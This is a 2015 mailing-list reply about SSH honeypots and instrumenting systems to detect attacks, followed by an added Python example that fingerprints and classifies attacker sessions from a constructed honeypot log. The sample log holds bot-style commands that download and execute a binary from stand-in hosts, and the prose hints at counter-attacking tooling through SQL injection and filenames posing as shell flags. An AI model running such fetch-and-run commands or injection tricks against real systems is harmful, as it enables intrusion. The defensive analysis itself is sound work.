Proven tradition out in the wild. I gather there are SSH honeypots that
allow logins with trivial attempts (pi/raspberry, admin/admin...), then
simply record which commands the attacker runs first. Usually they'll be
scripted commands to scope out the compromised system, and if it passes
muster it dials home.
I don't think those honeypots are designed to make much of a human
attacker, but they allow rapid identification and classification of
who's attacking and offer some scope for countermeasures.
For example, if your attacker is running a certain command and capturing
a certain form of expected output, what happens if your honeypot gives
it too much, or a different kind of output? :)
Is your automated attacker using SQL to store attack data? I hope it's
escaping input... Is your attacker using stars in any commands ('grep
foobar *')? Did you know you can have filenames that look like shell
command flags and bash will uncritically pass them as arguments?
On 03/02/15 18:55, Natanael wrote:
On 3 Feb 2015 19:19, "coderman" <[email protected]> wrote:
>
> On 2/3/15, [email protected] <[email protected]> wrote:
> > ...
> > John, you know this I'm sure, but for the record the highest
> > security places use sacrificial machines to receive e-mail and
> > the like, to print said transmissions to paper, and then those
> > (sacrificial) machines are sacrificed, which is to say they
> > are reloaded/rebooted. Per message. The printed forms then
> > cross an air gap and those are scanned before transmission to
> > a final destination on networks of a highly controlled sort.
> > I suspect, but do not know, that the sacrificial machines are
> > thoroughly instrumented in the countermeasure sense.
>
> > ... For the
> > entities of which I speak, the avoidance of silent failure is
> > taken seriously -- which brings us 'round to your (and my)
> > core belief: The sine qua non goal of security engineering is
> > "No Silent Failure."
>
> there was an interesting thread here last year on instrumenting
> runtimes to appear stock (vulnerable) but which fail in obvious ways
> when subversion is attempted. (after all, being able to observe an
> attack is the first step in defending against such a class...)
>
> "hack it first yourself, before your attacker does..."
Canary bugs / honeypot bugs?
--
Scientific Director, IndieBio Irish Programme
Got a biology-inspired business idea that $50,000 -
& 3 months in a well equipped lab could accelerate?
Apply for the Summer programme in Ireland:
http://indie.bio/apply-to-ireland
Twitter: @onetruecathal
Phone: +353876363185
miniLock: JjmYYngs7akLZUjkvFkuYdsZ3PyPHSZRBKNm6qTYKZfAM
peerio.com: cathalgarvey
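An added example (not from this thread or any honeypot project) of the "record the first commands, then classify" idea at the top of this reply: it groups a honeypot's command log by session, fingerprints each session by its first few normalized commands so the same bot script matches whichever staging host it points at, labels it by whether it only scopes out the box or also dials home, and lists where it dials home. The log format, session records, staging URLs and labels are all constructed.

```python
import hashlib, json, re
from collections import defaultdict
# Constructed honeypot log (not from any real tool): one JSON object per line with
# the session id, the trivial credentials that were accepted, and the command typed.
SAMPLE_LOG = """\
{"session": "s1", "user": "pi", "password": "raspberry", "cmd": "uname -a"}
{"session": "s1", "user": "pi", "password": "raspberry", "cmd": "cat /proc/cpuinfo | grep name | wc -l"}
{"session": "s1", "user": "pi", "password": "raspberry", "cmd": "cd /tmp; wget http://198.51.100.7/x86 -O .x; chmod +x .x; ./.x"}
{"session": "s2", "user": "admin", "password": "admin", "cmd": "uname  -a"}
{"session": "s2", "user": "admin", "password": "admin", "cmd": "cat /proc/cpuinfo | grep name | wc -l"}
{"session": "s2", "user": "admin", "password": "admin", "cmd": "cd /tmp; wget http://203.0.113.9/x86 -O .x; chmod +x .x; ./.x"}
{"session": "s3", "user": "root", "password": "toor", "cmd": "ls -la"}
"""
URL_RE = re.compile(r"(?:https?|ftp|tftp)://[^\s;|&\"']+")
FETCH_RE = re.compile(r"\b(?:wget|curl|tftp|ftpget)\b")
RUN_RE = re.compile(r"chmod\s+\+x|(?:^|[;&|]\s*)\./")
RECON = {"uname", "cat", "ls", "w", "id", "nproc", "free", "df"}

def normalize(cmd):
    # Collapse whitespace and blank out download locations, so one bot script
    # fingerprints identically whichever staging host it happens to use.
    return " ".join(URL_RE.sub("URL", cmd).split())

def parse_sessions(log_text):
    # Group records by session, keeping the order the commands were typed in.
    sessions = defaultdict(lambda: {"creds": None, "cmds": []})
    for line in filter(str.strip, log_text.splitlines()):
        rec = json.loads(line)
        sessions[rec["session"]]["creds"] = (rec["user"], rec["password"])
        sessions[rec["session"]]["cmds"].append(rec["cmd"])
    return dict(sessions)

def fingerprint(cmds, first_n=3):
    # Hash of the first N normalized commands: the scripted opening the post describes.
    opening = "\n".join(normalize(c) for c in cmds[:first_n])
    return hashlib.sha256(opening.encode()).hexdigest()[:16]

def classify(cmds):
    # Coarse label: scope out the box only, or scope it out and then dial home?
    joined = " ; ".join(cmds)
    if FETCH_RE.search(joined) and RUN_RE.search(joined):
        return "scripted_fetch_and_run"
    if any(c.split()[0] in RECON for c in cmds if c.split()):
        return "recon_only"
    return "unknown"

def summarize(log_text):
    # Per-session report: credentials used, tooling fingerprint, label, dial-home URLs.
    report = {}
    for sid, s in parse_sessions(log_text).items():
        urls = sorted({m.group(0) for c in s["cmds"] for m in URL_RE.finditer(c)})
        report[sid] = {"creds": s["creds"], "fingerprint": fingerprint(s["cmds"]),
                       "label": classify(s["cmds"]), "dials_home": urls}
    return report
```

Sessions s1 and s2 use different credentials and different staging hosts but get the same fingerprint, which is the point: the opening script identifies the tooling, not the IP it fetched from this time.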